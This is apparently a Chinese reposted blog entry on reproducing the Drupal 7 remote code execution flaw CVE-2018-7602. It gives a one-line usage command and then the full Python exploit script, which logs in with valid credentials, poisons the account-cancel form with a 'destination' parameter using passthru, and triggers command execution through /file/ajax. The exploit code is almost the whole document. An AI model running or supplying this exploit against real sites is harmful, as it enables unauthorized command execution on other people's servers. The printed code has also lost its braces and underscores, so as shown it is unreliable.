Drupal 远程代码执行漏洞(CVE-2018-7602)
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Drupal 远程代码执行漏洞(CVE-2018-7602)相关的知识,希望对你有一定的参考价值。
漏洞复现:1.如下图所示,执行以下命令即可复现该漏洞。示例命令为 id,如图红框中显示,可以执行该命令。
"id"为要执行的命令 第一个drupal为用户名 第二个drupal为密码python3 drupa7-CVE-2018-7602.py -c "id" drupal drupal http://ip:8081/
2.得有CVE-2018-7600的PoC。
#!/usr/bin/env python3import requests
import argparse
from bs4 import BeautifulSoup
def get_args():
parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7602.py",
formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
epilog= ‘‘‘
This script will exploit the (CVE-2018-7602) vulnerability in Drupal 7 <= 7.58
using an valid account and poisoning the cancel account form (user_cancel_confirm_form)
with the ‘destination‘ variable and triggering it with the upload file via ajax (/file/ajax).
‘‘‘)
parser.add_argument("user", help="Username")
parser.add_argument("password", help="Password")
parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
parser.add_argument("-x", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
args = parser.parse_args()
return args
def pwn_target(target, username, password, function, command, proxy):
requests.packages.urllib3.disable_warnings()
session = requests.Session()
proxyConf = ‘http‘: proxy, ‘https‘: proxy
try:
print(‘[] Creating a session using the provided credential...‘)
get_params = ‘q‘:‘user/login‘
post_params = ‘form_id‘:‘user_login‘, ‘name‘: username, ‘pass‘ : password, ‘op‘:‘Log in‘
print(‘[] Finding User ID...‘)
session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
get_params = ‘q‘:‘user‘
r = session.get(target, params=get_params, verify=False, proxies=proxyConf)
soup = BeautifulSoup(r.text, "html.parser")
user_id = soup.find(‘meta‘, ‘property‘: ‘foaf:name‘).get(‘about‘)
if ("?q=" in user_id):
user_id = user_id.split("=")[1]
if(user_id):
print(‘[] User ID found: ‘ + user_id)
print(‘[] Poisoning a form using \‘destination\‘ and including it in cache.‘)
get_params = ‘q‘: user_id + ‘/cancel‘
r = session.get(target, params=get_params, verify=False, proxies=proxyConf)
soup = BeautifulSoup(r.text, "html.parser")
form = soup.find(‘form‘, ‘id‘: ‘user-cancel-confirm-form‘)
form_token = form.find(‘input‘, ‘name‘: ‘form_token‘).get(‘value‘)
get_params = ‘q‘: user_id + ‘/cancel‘, ‘destination‘ : user_id +‘/cancel?q[%23post_render][]=‘ + function + ‘&q[%23type]=markup&q[%23markup]=‘ + command
post_params = ‘form_id‘:‘user_cancel_confirm_form‘,‘form_token‘: form_token, ‘_triggering_element_name‘:‘form_id‘, ‘op‘:‘Cancel account‘
r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
soup = BeautifulSoup(r.text, "html.parser")
form = soup.find(‘form‘, ‘id‘: ‘user-cancel-confirm-form‘)
form_build_id = form.find(‘input‘, ‘name‘: ‘form_build_id‘).get(‘value‘)
if form_build_id:
print(‘[] Poisoned form ID: ‘ + form_build_id)
print(‘[] Triggering exploit to execute: ‘ + command)
get_params = ‘q‘:‘file/ajax/actions/cancel/#options/path/‘ + form_build_id
post_params = ‘form_build_id‘:form_build_id
r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
parsed_result = r.text.split(‘["command":"settings"‘)[0]
print(parsed_result)
except:
print("ERROR: Something went wrong.")
raise
def main():
print ()
print (‘===================================================================================‘)
print (‘| DRUPAL 7 <= 7.58 REMOTE CODE EXECUTION (SA-CORE-2018-004 / CVE-2018-7602) |‘)
print (‘| by pimps |‘)
print (‘===================================================================================\n‘)
args = get_args() # get the cl args
pwn_target(args.target.strip(),args.user.strip(),args.password.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())
if name == ‘main‘:
main()
3.然后再执行。
以上是关于Drupal 远程代码执行漏洞(CVE-2018-7602)的主要内容,如果未能解决你的问题,请参考以下文章
ThinkPHP 5.0.23 远程代码执行漏洞(CVE-2018-20062)漏洞复现
威胁预警:WebSphere Application Server远程代码执行漏洞(CVE-2018-1567)
PostgreSQL远程代码执行漏洞(CVE-2018-1058)学习笔记
每周播报Oracle WebLogic Server反序列化远程代码执行漏洞成焦点